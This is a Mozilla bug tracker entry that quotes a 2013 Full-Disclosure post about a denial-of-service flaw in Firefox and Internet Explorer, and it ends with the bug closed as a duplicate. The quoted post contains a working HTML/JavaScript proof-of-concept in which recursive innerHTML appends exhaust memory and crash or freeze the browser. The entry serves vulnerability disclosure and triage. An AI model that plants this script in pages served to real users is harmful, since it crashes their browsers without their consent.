Closed
Bug 883818
Opened 11 years ago
Closed 4 years ago
DoS vulnerability in Mozilla Firefox
Categories
(Core :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 612029
People
(Reporter: curtisk, Unassigned)
Details
(Keywords: csectype-oom, sec-low)
http://seclists.org/fulldisclosure/2013/Jun/121 -----//----- From: "MustLive" <mustlive () websecurity com ua> Date: Sat, 15 Jun 2013 21:02:26 +0300 -----//----- Hello list! I want to warn you about Denial of Service vulnerability in Mozilla Firefox and Microsoft Internet Explorer. Earlier Jean Pascal Pereira has found DoS vulnerability in browser Firefox 14.0.1 (http://1337day.com/exploit/description/19201). And at 07.04.2013 I've checked this vulnerability and found, that many other browsers are vulnerable to these attack. ------------------------- Affected products: ------------------------- Vulnerable are Mozilla Firefox 3.5.19, 3.6.28, 10.0.7 ESR, 15.0.1, Internet Explorer 7 (7.00.5730.13) and Internet Explorer 8 (8.00.6001.18702). And also must be vulnerable previous versions of these browsers and potentially more newer versions of Firefox and Internet Explorer. ---------- Details: ---------- Denial of Service (WASC-10): The attack occurs via infinite recursion. Which leads to RAM consuming. My version of the exploit for different browsers. Mozilla Firefox & IE DoS Exploit.html <html> <head> <title>Mozilla Firefox 3.5.19 - 15.0.1, IE7 and IE8 DoS Exploit (C) 2013 MustLive. http://websecurity.com.ua</title> <!-- Based on exploit by Jean Pascal Pereira (http://1337day.com/exploit/description/19201) --> </head> <body> <script> function e(x) { document.body.innerHTML += x; e(x + 'x'); } e('x') </script> </body> </html> Browser crash works in Firefox 10.0.7 ESR and 15.0.1, but doesn't work in 3.0.19 and previous versions. In Firefox 3.5.19 and 3.6.28, IE7 and IE8 there is only freezing. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Comment 1•11 years ago
|
||
DOS issues don't need to remain private.
Updated•11 years ago
|
Whiteboard: DUPEME
He exactly copied the PoC from Jean Pascal, added " <!-- Based on exploit by Jean Pascal Pereira (http://1337day.com/exploit/description/19201) -->" to the <title> tag and called it "his version of this exploit for different browsers". This is completely retarded.
dupe of bug 612029?
Updated•4 years ago
|
No longer blocks: eviltraps
Status: UNCONFIRMED → RESOLVED
Closed: 4 years ago
Resolution: --- → DUPLICATE
Whiteboard: DUPEME
You need to log in
before you can comment on or make changes to this bug.
Description
•